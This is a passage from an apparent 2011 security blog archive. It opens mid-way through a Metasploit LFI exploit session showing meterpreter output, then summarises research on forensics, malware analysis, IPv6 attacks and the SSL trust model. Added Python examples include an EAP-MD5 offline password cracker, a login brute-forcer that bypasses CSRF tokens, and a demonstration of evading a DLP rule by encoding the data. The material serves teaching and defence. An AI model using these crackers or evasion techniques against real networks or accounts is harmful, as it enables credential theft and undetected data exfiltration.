^C[-] Exploit exception: Interrupt
[*] Session 1 created in the background.
msf exploit(php_lfi) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ls

Listing: /usr/home/test/cherokee/www
=====================================

Mode              Size  Type  Last modified                   Name
----              ----  ----  -------------                   ----
100644/rw-r--r--  0     fil   Tue May 10 11:09:39 +0200 2011  foo.php
40755/rwxr-xr-x   512   dir   Tue May 10 10:53:59 +0200 2011  images
100644/rw-r--r--  1795  fil   Tue May 10 10:19:23 +0200 2011  index.html
100644/rw-r--r--  37    fil   Tue May 10 13:52:25 +0200 2011  index.php

meterpreter > sysinfo
OS          : FreeBSD redphantom.skynet.ct 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Thu Feb 17 02:41:51 UTC 2011     root@mason.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
Computer    : redphantom.skynet.ct
Meterpreter : php/php
meterpreter > exit




php_lfi.rb

Python Port of RegRipper Added to Volatility

Thanks to this post I have learned that a Python port of RegRipper has been written and integrated as a Volatility plugin.

This means that Volatility can now run RegRipper's plugins directly against the registry hives cached in memory, without first dumping the hives to disk.

How to Extract Flash Objects from Malicious PDF Files

Nice post from the SANS Computer Forensics Blog that explains how to extract Flash objects from malicious PDF files.

Why use Flash objects in PDF files? Attackers seem to use ActionScript as an alternative to JavaScript to perform the heap spray.

This cheat sheet is used in conjunction with pdf-parser or PDF Stream Dumper to extract the objects contained in the PDF.

Once the Flash object has been extracted, SWFTools is used to disassemble it (swfdump) and proceed with the analysis.

At the end, the author of the post links to a real-life example.
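As an added example (mine, not the SANS author's), this Python carves SWF objects out of a PDF by trying every stream body, raw and inflated, against the three SWF signatures, and parses the SWF header so that a CWS file is handed to the disassembler uncompressed. The document and the SWF inside it are constructed inline and are not real malware:

```python
import re
import struct
import zlib

SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")   # plain, zlib-compressed, LZMA-compressed


def carve_swf(pdf):
    """Return (offset, swf_bytes) for every stream whose raw or inflated body
    starts with an SWF signature. Carving rather than parsing: it does not
    care whether the PDF's object structure is intact or the /Length is right."""
    found = []
    for m in re.finditer(rb"(?<!end)stream\r?\n", pdf):
        start = m.end()
        end = pdf.find(b"endstream", start)
        if end < 0:
            continue
        body = pdf[start:end]
        # the writer puts one end-of-line before "endstream"; strip only that
        if body.endswith(b"\r\n"):
            body = body[:-2]
        elif body.endswith(b"\n") or body.endswith(b"\r"):
            body = body[:-1]
        candidates = [body]
        try:
            candidates.append(zlib.decompress(body))   # a /FlateDecode stream
        except zlib.error:
            pass
        for data in candidates:
            if data[:3] in SWF_SIGNATURES:
                found.append((start, data))
    return found


def swf_header(swf):
    """Parse the 8-byte SWF header and hand back the uncompressed body,
    inflating CWS files (ZWS needs an LZMA decoder and is left alone)."""
    signature, version = swf[:3], swf[3]
    length = struct.unpack("<I", swf[4:8])[0]   # length of the uncompressed file
    body = swf[8:]
    if signature == b"CWS":
        body = zlib.decompress(body)
    return {"signature": signature.decode(), "version": version,
            "length": length, "body": body}


# --- constructed sample: a CWS (zlib-compressed) SWF inside a FlateDecode stream
# The SWF body is made-up bytes standing in for the frame size, rate, count and
# tags; it only has to survive the round trip.
SWF_BODY = bytes.fromhex("7800055f0000fa00000c010044010000")
SWF = b"CWS" + bytes([10]) + struct.pack("<I", 8 + len(SWF_BODY)) + zlib.compress(SWF_BODY)
STREAM = zlib.compress(SWF)
SAMPLE_PDF = (
    b"%PDF-1.6\n"
    + b"7 0 obj << /Length 9 >>\nstream\nBT ET q Q\nendstream\nendobj\n"
    + b"8 0 obj << /Type /EmbeddedFile /Subtype /application#2Fx-shockwave-flash"
    + b" /Filter /FlateDecode /Length " + str(len(STREAM)).encode() + b" >>\n"
    + b"stream\n" + STREAM + b"\nendstream\nendobj\n"
    + b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for offset, swf in carve_swf(SAMPLE_PDF):
        info = swf_header(swf)
        print(f"SWF at stream offset {offset}: {info['signature']} v{info['version']}, "
              f"{info['length']} bytes uncompressed, {len(info['body'])} bytes of tags")
        with open(f"carved_{offset}.swf", "wb") as fh:
            fh.write(swf)
```

Write the carved object out and run swfdump -a on it (or -D for everything) to get the ActionScript. Objects hidden inside an object stream (/ObjStm) need that container inflated first, which this carver does not attempt.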

Tuesday, May 17, 2011

Collection of SMBRelay attacks

This is a series of blog posts from the Digital Security Research Group that collects all the possible ways to gain access by executing SMBRelay attacks or by stealing token credentials.

So far, they have discussed the following scenarios:

- Attacking ERP systems.

- Attacking MSSQL servers.

- SMBRelay and Oracle.

- Security software that scans the clients via SMB

- Attacking corporate users

Fooling Bots and Web Scanners with WebLabyrinth

Nice tech segment from Pauldotcom that explains how to install WebLabyrinth, a set of PHP scripts that detects and fools bots and web scanners by trapping them in a 'labyrinth' of links.




Monday, May 9, 2011

Analyzing a Compromised Linux Server With Volatility

Challenge 7 of the Honeynet Project's Forensic Challenge 2011 is a good opportunity to use Volatility to analyze a compromised Linux server.

The disk image and the memory dump seem to show a compromise via an unpatched vulnerability in Exim (CVE-2010-4345).

Thursday, May 5, 2011

Why is Metasploit flagged by the AVs?

Nice article from Scriptjunkie that explains why the Metasploit binaries are flagged by the AVs.

As I understand it, a Metasploit executable template allocates an RWX memory area, copies the (encoded) shellcode into it and transfers execution there. Therefore, the AVs are not detecting the encoded shellcode but the executable template that loads it, which is the same in every generated binary.

A possible solution would be to patch another binary of your choosing, but the AVs may flag it as well, because allocating an RWX memory area and then pointing the instruction pointer at it is really suspicious behaviour.

Why I do not trust the cloud

This post in the Amazon forums is impressive in many senses. It explains how cloud computing plus bad engineering can put human lives and a business at risk.

Somebody was clever enough to put a critical service like a cardiac patient monitoring system on the cloud, without any kind of backup. Yes, it sounds bad for many reasons...

It turns out that Amazon EC2 went down for some days and the company had all its critical services installed there, without any backup system in another datacenter or whatsoever. I understand they decided to go to the cloud because it was way cheaper compared with maintaining their own infrastructure, but without paying attention to the possible problems, the requirements and the regulations they have to comply with.

This is a good example to present to decision makers when they discuss moving parts of the infrastructure to cloud services versus running their own. It may be good for the business in the short term, but be prepared for the problems: a single provider region is still a single point of failure.

Wednesday, April 27, 2011

EAP-MD5 Offline password attacks

This post from Pauldotcom explains how to perform offline dictionary attacks against EAP-MD5 authentication packets (802.1X-protected networks).

Once we have a packet capture with the authentication exchange (the identifier, the challenge and the response), the post offers two possibilities:
- A patched version of xtest that reads the candidate passwords through a pipe (John the Ripper produces the password list)
- A small Scapy script called eapmd5crack.py
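To show what the offline attack actually computes, here is an added Python example (mine, not the eapmd5crack.py script from the post) that parses the EAP-MD5 Request and Response, recomputes MD5(Identifier || password || Challenge) for each wordlist entry and stops on a match. The two packets and the wordlist are constructed inline:

```python
import hashlib


def eap_md5_response(identifier, password, challenge):
    """EAP-MD5 (RFC 3748 section 5.4, same construction as CHAP in RFC 1994):
    Response Value = MD5(Identifier || password || Challenge)."""
    return hashlib.md5(bytes([identifier]) + password + challenge).digest()


def build_eap_md5(code, identifier, value, name=b""):
    """EAP packet: Code(1) Identifier(1) Length(2) Type(1)=4 Value-Size(1) Value Name."""
    payload = bytes([4, len(value)]) + value + name
    return bytes([code, identifier]) + (4 + len(payload)).to_bytes(2, "big") + payload


def parse_eap_md5(packet):
    """Pull the fields an attacker needs out of a captured EAP-MD5 packet."""
    code, identifier = packet[0], packet[1]
    length = int.from_bytes(packet[2:4], "big")
    if packet[4] != 4:
        raise ValueError("not an EAP-MD5-Challenge packet (type %d)" % packet[4])
    size = packet[5]
    return {"code": code, "identifier": identifier,
            "value": packet[6:6 + size], "name": packet[6 + size:length]}


def crack_eap_md5(request, response, wordlist):
    """Offline dictionary attack: the Request (code 1) carries the challenge,
    the Response (code 2) carries the digest and the same Identifier."""
    req, rsp = parse_eap_md5(request), parse_eap_md5(response)
    if req["code"] != 1 or rsp["code"] != 2 or req["identifier"] != rsp["identifier"]:
        raise ValueError("packets are not a matching Request/Response pair")
    for word in wordlist:
        candidate = word.strip()
        if eap_md5_response(rsp["identifier"], candidate, req["value"]) == rsp["value"]:
            return candidate
    return None


# --- constructed capture: what a sniffer would see on the wire ---------------
CHALLENGE = bytes.fromhex("1f2e3d4c5b6a79880102030405060708")   # made-up challenge
PASSWORD = b"letmein"                                           # made-up secret
REQUEST = build_eap_md5(1, 0x2a, CHALLENGE, b"switch")
RESPONSE = build_eap_md5(2, 0x2a, eap_md5_response(0x2a, PASSWORD, CHALLENGE), b"alice")
WORDLIST = [b"password", b"123456", b"letmein", b"qwerty"]

if __name__ == "__main__":
    print("recovered password:", crack_eap_md5(REQUEST, RESPONSE, WORDLIST))
```

With a real capture, feed the EAP payloads of the Request and Response frames (the EAPOL layer stripped) and pipe the wordlist from John the Ripper's --stdout mode, exactly as the post does with xtest.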

Converting Unicode to Shellcode

Some nice shell-fu to decode Unicode-encoded (%uXXXX) shellcode. It is common to find this kind of payload in Microsoft Office and PDF files that contain exploits (the exploit's JavaScript builds the shellcode with unescape()), and these techniques always come in handy.
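The decoding itself is a few lines of Python. This is an added example (mine, not the shell-fu from the linked post) that emulates unescape() on the %uXXXX strings pulled out of an exploit's JavaScript, strips the NO-OP sled and prints the bytes as a C array for a disassembler. The JavaScript it parses is a constructed snippet, not a real sample:

```python
import re

ESCAPE_RE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")
# quoted literals made only of escapes: the usual unescape("%u..." + "%u...")
STRING_RE = re.compile(r"""["']((?:%u[0-9A-Fa-f]{4}|%[0-9A-Fa-f]{2})+)["']""")


def unescape_bytes(text):
    """Emulate JavaScript unescape() on shellcode text and return raw bytes.
    %uXXXX is a UTF-16LE code unit, so its two bytes come out swapped
    (%uE8FC -> FC E8); %XX is a single byte; other characters pass through."""
    out = bytearray()
    pos = 0
    for m in ESCAPE_RE.finditer(text):
        out += text[pos:m.start()].encode("latin-1")
        if m.group(1):
            out += bytes.fromhex(m.group(1))[::-1]
        else:
            out.append(int(m.group(2), 16))
        pos = m.end()
    out += text[pos:].encode("latin-1")
    return bytes(out)


def extract_shellcode(js):
    """Concatenate every escaped string literal found in the script."""
    return unescape_bytes("".join(STRING_RE.findall(js)))


def split_sled(shellcode, nop=0x90):
    """Return (sled_length, payload): skip the NOP sled a heap spray prepends."""
    n = 0
    while n < len(shellcode) and shellcode[n] == nop:
        n += 1
    return n, shellcode[n:]


def as_c_array(data, per_line=12):
    """Render bytes as the "\\x.." string literals a C stub or ndisasm wants."""
    return "\n".join('"' + "".join(f"\\x{b:02x}" for b in data[i:i + per_line]) + '"'
                     for i in range(0, len(data), per_line))


# constructed sample: a short sled followed by the start of a call/pop stub
SAMPLE_JS = ('var sled = unescape("%u9090%u9090");\n'
             'var sc = unescape("%uE8FC%u0000%u5B00%u4B81");\n'
             'var spray = sled + sc;')

if __name__ == "__main__":
    sc = extract_shellcode(SAMPLE_JS)
    sled, payload = split_sled(sc)
    print(f"{len(sc)} bytes, sled of {sled}; payload:")
    print(as_c_array(payload))
```

Remember the byte swap: %uE8FC is FC E8 in memory (cld; call ...), so a dump that looks like "E8 FC" is the sign that someone forgot it.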

Wednesday, April 20, 2011

Attacking Oracle Web Applications With Metasploit

Excellent presentation by Chris Gates (carnal0wnage) on Attacking Oracle Web Applications With Metasploit [PDF]

TCP Split Handshake

I have found the following whitepaper  that explains the TCP Split Handshake [PDF] and its implications.

Layer 2 attacks on IPv6

Via the Internet Storm Center.

NDP spoofing is the IPv6 equivalent of ARP spoofing in IPv4 and can be used to play MITM.

RA spoofing (rogue Router Advertisements, the IPv6 counterpart of a rogue DHCP server) can be used to impersonate routers and hand out addresses and default gateways to the victims.

RawCap Windows Sniffer

RawCap is a sniffer for Windows systems that does not need any external library or DLL to run, which makes it really useful for penetration testing.

Here are some highlights of why RawCap is a great tool to have in your toolset:
  • Can sniff any interface that has got an IP address, including 127.0.0.1 (localhost/loopback) 
  • RawCap.exe is just 17 kB
  • No external libraries or DLL's needed
  • No installation required, just download RawCap.exe and sniff
  • Can sniff most interface types, including WiFi and PPP interfaces
  • Minimal memory and CPU load
  • Reliable and simple to use

Wednesday, April 13, 2011

Malware analysis with ClamAV and YARA

Via Infosec Resources

YARA is an extremely flexible identification and classification engine written by Victor Manuel Alvarez of Hispasec Sistemas. It runs on Windows, Linux and Mac OS X, and can be used through its command-line interface or from your own Python scripts with the yara-python extension.
YARA rules are easy to write and understand. They have a syntax that resembles a C struct declaration. However, creating thousands of rules takes a lot of time and effort. That's why it makes more sense to use ClamAV signatures. Usually ClamAV signatures can be found under /usr/local/share/clamav or /usr/lib/clamav on Linux systems. This is where you will find main.cld and daily.cld (alternately, they may have .cvd extensions). The main.cld file contains the primary base of signatures and daily.cld contains the incremental daily updates.


These tools are well explained in the Malware Analyst's Cookbook and DVD book.

IPv6 Pen-testing

Via www.room362.com



Rick Hayes - Assessing and Pen-Testing IPv6 Networks from Adrian Crenshaw on Vimeo.

Monday, April 11, 2011

Anatomy of the RSA compromise

This blog post from the RSA explains how the attackers gained access to their data.

In a nutshell, the attackers used social engineering (a spear-phishing e-mail) to get an employee to open an Excel spreadsheet that contained a malicious Flash object (zero-day CVE-2011-0609). Once they had backdoored the computer, they used the harvested credentials to gain further access in the network (privileged accounts and systems) and stole the data.

Analyzing a Stuxnet infection with the Sysinternals Tools

A really good blog post on TechNet that explains how a machine is infected with Stuxnet and how the infection process can be analyzed with the Sysinternals tools.

An overview of Rustock

It is known that Rustock has been taken down, but it is always a good idea to understand how a computer gets infected with malware, especially if you have to respond to this kind of incident and/or design the defenses.

This nice post from the FireEye blog gives a good overview of how a computer can be infected with Rustock.

Thursday, March 31, 2011

Timeline analysis on Pauldotcom

Awesome tech segment on MFT timeline analysis from the Pauldotcom guys.

The tech segment explains how to perform a timeline analysis with open-source tools and how to spot anti-forensics techniques like timestamp manipulation.

More information on timestamp manipulation can be found on the SANS Computer Forensics Blog, which I already commented on in this post.

The original blog post on the SANS Computer Forensics Blog talks about a tool called mft_parser_cl, created by Mark McKinnon and released for this tech segment. It is really helpful to spot timestamp manipulations, because it pulls the $FILE_NAME timestamps (which the usual timestomping tools leave alone, unlike $STANDARD_INFORMATION) and puts them into bodyfile format so they can be added to the overall timeline for analysis.





iPhone forensics with Paraben

Via InfoSec Institute.

In this video, we will review the wealth of forensic data stored on an iPhone 3Gs using Paraben’s Device Seizure software.

The following information can be extracted out of the iPhone:
  •  Web browser history
  • A history of all locations looked up on map applications
  • The phone’s serial number and the owner’s public key
  • The call and text history, including call durations
  • Dynamic text which is a wealth of useful forensic information



iPhone Forensics & Data Recovery from darren dalasta on Vimeo.

Tuesday, March 29, 2011

Microsoft has taken down the Rustock botnet

Probably many people are already aware, because this information has made many headlines and hit the media.

Yes, Microsoft has reportedly taken down the Rustock botnet, like they did before with Waledac.

I tend to think it was a coordinated effort with many researchers and institutions involved, but we cannot deny that Microsoft has the resources needed to make it possible :)

This is a small compilation of articles/post I have found on Internet:

General explanation,
http://www.h-online.com/security/news/item/Rustock-botnet-out-of-action-1210450.html

Legal order,
http://www.noticeofpleadings.com/

Complaint,
http://blogs.technet.com/cfs-file.ashx/__key/CommunityServer-Blogs-Components-WeblogFiles/00-00-00-82-95-DCU/2112.2011_2D00_02_2D00_09_2D00_Complaint.pdf


Really nice explanation by Brian Krebs, as always :)
http://krebsonsecurity.com/2011/03/homegrown-rustock-botnet-fed-by-u-s-firms/


Arstechnica
http://arstechnica.com/microsoft/news/2011/03/how-operation-b107-decapitated-the-rustock-botnet.ars

Monday, March 28, 2011

SpyEye Botmasters Try To Sabotage abuse.ch

I have learnt via this post that cybercriminals are trying to sabotage abuse.ch's trackers.

They have added a DDoS plug-in to the trojans that attacks the trackers' infrastructure, and they are also trying to get legitimate domains listed in the tracker by adding them to the list of drop points, so that the blacklist causes collateral damage.

Extracting Real VNC passwords from the Windows Registry

This post from carnal0wnage explains how to extract the RealVNC passwords from the Windows Registry (the Password value under the RealVNC WinVNC4 key).

The password is DES-encrypted, but RealVNC uses a hardcoded key, so 'encrypted' really means 'obfuscated': anyone who can read the registry value can recover the plaintext. No comments on that ... :)

Thursday, March 24, 2011

CAs being owned and the SSL trust model

I really recommend reading this post from Jacob Appelbaum if you want to understand the story of the compromised CA.

In short, it seems that a registration authority (RA) affiliated with Comodo was compromised and the attacker got valid certificates issued under the 'COMODO High Assurance Secure Server CA'.

I quote Comodo's statement:

One user account in one RA was compromised. The attacker created himself a new userID (with a new username and password) on the compromised user account.

It seems that some of the issued certificates were for: login.live.com, mail.google.com, www.google.com, login.yahoo.com (3 certificates), login.skype.com and addons.mozilla.org.

So far, with the above information, we can discuss how broken the SSL trust model is, since any single compromised CA (or an RA that a CA blindly trusts) can cause big damage and make a MITM attack possible against a big website like mail.google.com, because every browser trusts every root equally.

But that is not all. It seems that the main browser vendors were 'silently' issuing patches to blacklist the created certificates until Appelbaum analyzed the serial numbers in those patches, as explained in the post.

Also, the Certificate Revocation Lists (CRL) do not seem to work because the browsers 'fail open' by default. This means that the browser will not complain if it cannot fetch the CRL or get an OCSP answer (and the CAs do not seem to help a lot in making things better), so the certificate is blindly accepted, as explained here. An attacker who is already in a MITM position can simply block the revocation check.

Finally, Comodo seems to blame the Iranian government because the attack came from an Iranian IP address, but in my opinion that does not mean that the Iranian government is behind it.

Wednesday, March 23, 2011

Windows Integrity Levels explained

This post from the Internet Storm Center explains the concept of integrity levels, a mechanism available on Windows Vista, 7 and 2008.

Integrity levels can restrict one process from interacting with another process even if both processes are running under the same user account and even if the user has administrative privileges. 

Basically, a process running at a lower integrity level is limited in the way it can interact with processes running at a higher integrity level, regardless of the access rights (the mandatory label is checked before the DACL). This can be really helpful to mitigate a successful exploit. You can see the level of your own token with whoami /groups (the 'Mandatory Label' line) and the level of every process in the Integrity column of Process Explorer.

This is why it's advantageous to run the processes that are likely to be targeted by exploits under the Low integrity level. For instance, if a browser running under the Low integrity level gets exploited, the attacker's payload will have a hard time injecting itself into the majority of other processes or modifying critical files.

It seems it is a key building block of the sandboxes in Internet Explorer (Protected Mode), Chrome and the new Adobe Acrobat/Reader.

The article links to the following blog post written by Didier Stevens, Integrity Levels and DLL Injection. It describes how this feature blocks a DLL injection attempt from a Low integrity process into a Medium integrity one.

Network Sniffers Class

Via IronGeek, an awesome set of tools and videos that will help you perform sniffing and MITM attacks.

I link to the videos on Vimeo, but his site is really worth a visit :)



Sniffers Class Part 1 from Adrian Crenshaw on Vimeo.



Sniffers Class Part 2 from Adrian Crenshaw on Vimeo.



Sniffers Class Part 3 from Adrian Crenshaw on Vimeo.

Snort and Sguil easy installation with a Slackware Linux ISO

Via the Internet Storm Center, there is a  Slackware Linux ISO installation with Sguil ready to use.

More info here [pdf]

DNS Prefetching implications

DNS prefetching can be a nice feature to speed up browsing, but it can cause a big headache and a big bill as well if you run a website with many visits.

Via this post you can learn what happens when your website has many subdomains and all of them are prefetched on each visit. This is really important if you are paying for your DNS service and the number of queries matters. Firefox seems to be even worse, because it also tries to resolve IPv6 addresses (AAAA query) for each subdomain.

It seems that browsers honor a standard tag that permits disabling prefetching: <meta http-equiv="x-dns-prefetch-control" content="off"> in the page, or the X-DNS-Prefetch-Control: off response header.

More info on Controlling DNS Prefetching

Thursday, March 17, 2011

bad password implementations and brute-force attacks

This series of posts [ 1 , 2 ] from SkullSecurity is really enlightening.

I understand that the main error here is generating the passwords from a pseudo-random generator seeded with a small number. I am not an expert, but the number of possible passwords (the universe) is bounded by the number of possible seeds, not by the length or the alphabet of the password. Therefore, if the seed is taken from a range of 1,000,000 values, there are only one million possible passwords, which can easily be pre-calculated (pairs of password and MD5 hash) and used in an offline attack with John the Ripper.

The attack in the second post is fairly similar, but it ends up with a really small universe of only 15,993 possible passwords, due to a really bad implementation that even permits an easy and successful online attack.

The online attack consists of grabbing the HTML output of a failed login and then comparing the HTML output of each brute-force attempt against it. If the md5sum does not match, the password is valid (provided the page has no per-request content like a CSRF token, which would make every response differ).
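To make both points concrete, an added Python example (not SkullSecurity's code): a deliberately weak generator seeded from a small range, the precomputed md5-to-password table that collapses the universe, and the online comparison attack, including the normalization step you need when the page carries a per-request token. The generator, the 'web application' and its secret are assumed stand-ins:

```python
import hashlib
import random
import re

ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def generate_password(seed, length=8):
    """Assumed weak generator: a PRNG seeded from a small integer. The output
    looks random, but there are only as many passwords as there are seeds."""
    rng = random.Random(seed)
    return "".join(rng.choice(ALPHABET) for _ in range(length))


def password_universe(seed_space, length=8):
    """md5(password) -> password for every password the generator can emit."""
    return {hashlib.md5(pw.encode()).hexdigest(): pw
            for pw in (generate_password(s, length) for s in seed_space)}


def offline_lookup(table, md5_hex):
    """Offline attack: a stolen hash is answered by one dictionary lookup."""
    return table.get(md5_hex.lower())


HIDDEN_RE = re.compile(r'(<input[^>]*type="hidden"[^>]*value=")[^"]*(")')


def normalize(html):
    """Blank per-request values (anti-CSRF tokens, nonces) so two failure
    pages hash the same; without this every response looks like a success."""
    return HIDDEN_RE.sub(r"\1\2", html)


def online_bruteforce(login, candidates, normalize=normalize):
    """Online attack: the only oracle is 'does the page differ from a failed login'."""
    failed = hashlib.md5(normalize(login("definitely-not-it")).encode()).hexdigest()
    for pw in candidates:
        if hashlib.md5(normalize(login(pw)).encode()).hexdigest() != failed:
            return pw
    return None


# --- constructed target standing in for the web application -------------------
SECRET = generate_password(4242)        # the victim's password came from the generator
_counter = [0]


def fake_login(password):
    _counter[0] += 1                    # a fresh token on every response
    token = f'<input type="hidden" name="csrf" value="{_counter[0]:08x}">'
    body = "Welcome back" if password == SECRET else "Login failed"
    return f"<html><body><form>{token}</form><p>{body}</p></body></html>"


if __name__ == "__main__":
    table = password_universe(range(10000))          # 10,000 seeds, 10,000 passwords
    print("universe size:", len(table))
    print("online attack recovers:", online_bruteforce(fake_login, list(table.values())))
```

The 10,000-seed universe here is a stand-in for the one million of the first post; the point is that the table is built once and every subsequent hash falls in one lookup.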

Analyzing malware packaged in malicious PDF files

Great post from research.zscaler.com.

It explains how to analyze a PDF that contains malicious code. The following steps are followed during the analysis:

- Analyze/extract the different objects from the PDF file. In this case the file contains JavaScript code.
- Use Malzilla to evaluate the JavaScript code and extract the shellcode, which is Unicode-encoded (%uXXXX).
- Decode the shellcode to obtain a valid executable binary.
- Use a debugger (OllyDbg) to analyze the binary. The analyst extracts the XORed code from the binary.
- Use the debugger again to analyze the extracted code. It contacts a website to download the second stage and infect the host.

Wednesday, March 9, 2011

DLP is the next Silver Bullet

I think I really do not need to explain what DLP is, unless you have been disconnected for many years.

I was astonished when I first read this post from the Internet Storm Center. The post describes a setup of Snort running on a bridge and inspecting the traffic between the corporate network and the border router (fair enough).

Then, the following rule is used as an example to catch a possible data exfiltration.

alert ip 192.168.1.0/24 any -> any any (msg:"Data Loss from inside the network"; content:"Company X - Confidential"; rev:1)

I am not an expert in security and you do not have to trust my words, but I think that deploying a device in front of the border router with this kind of signature is only going to catch the most naive users (as written, the rule is also missing the sid option that Snort expects on every rule).

A skilled attacker will encode, encrypt or split the data and 'act' like a normal user in order to bypass this kind of rule; a per-packet content match does not even see a string that straddles two segments unless the IDS reassembles the stream first. Therefore, we are just getting a false sense of security.

I think the only way to detect a skilled attacker is by knowing your network and applying the ideas explained in this book from Richard Bejtlich: Extrusion Detection: Security Monitoring for Internal Intrusions
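To see how little that rule buys, an added Python example (mine, not from the ISC post) runs the literal content match over three ways of moving the same constructed document out: plain text split across TCP segments, base64, and a one-byte XOR. The packet sizes and the document are assumptions:

```python
import base64

NEEDLE = b"Company X - Confidential"     # the literal from the rule


def per_packet_match(packets, needle=NEEDLE):
    """What a plain content: match sees when each packet is inspected alone."""
    return [i for i, p in enumerate(packets) if needle in p]


def reassembled_match(packets, needle=NEEDLE):
    """The same match after TCP stream reassembly."""
    return needle in b"".join(packets)


def segment(data, size):
    return [data[i:i + size] for i in range(0, len(data), size)]


# three ways the same document can leave the network
def exfil_plain(doc, mss=16):
    """Naive user: plain text, but the string happens to straddle two segments."""
    return segment(doc, mss)


def exfil_base64(doc, mss=64):
    """Trivial encoding: the literal never appears on the wire."""
    return segment(base64.b64encode(doc), mss)


def exfil_xor(doc, key=0x5a, mss=64):
    """Anything resembling encryption: nothing signature-based will match."""
    return segment(bytes(b ^ key for b in doc), mss)


def decode_and_match(packets, needle=NEEDLE):
    """One extra layer an IDS could add: try base64 on the reassembled stream."""
    stream = b"".join(packets)
    try:
        return needle in base64.b64decode(stream, validate=True)
    except ValueError:            # binascii.Error is a ValueError
        return False


DOC = b"Memo: Company X - Confidential. Q3 numbers attached."   # constructed

if __name__ == "__main__":
    for name, packets in [("plain", exfil_plain(DOC)), ("base64", exfil_base64(DOC)),
                          ("xor", exfil_xor(DOC))]:
        print(f"{name:>7}: per-packet={per_packet_match(packets)} "
              f"reassembled={reassembled_match(packets)} "
              f"base64-decoded={decode_and_match(packets)}")
```

Stream reassembly fixes the first case, a decoder layer fixes base64, and nothing signature-based fixes the third, which is why a rule like this only gives a false sense of security against anyone who tries.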

Monday, March 7, 2011

Linux Support to Volatility

It looks like people are working on supporting Linux memory images in Volatility. You can find more information on the Volatility blog and on attrc's blog (the developer).

attrc's blog post is especially interesting because it explains the functionality implemented so far.

There is also this nice blog post that explains how to use the new Linux support in Volatility to solve the last Honeynet challenge.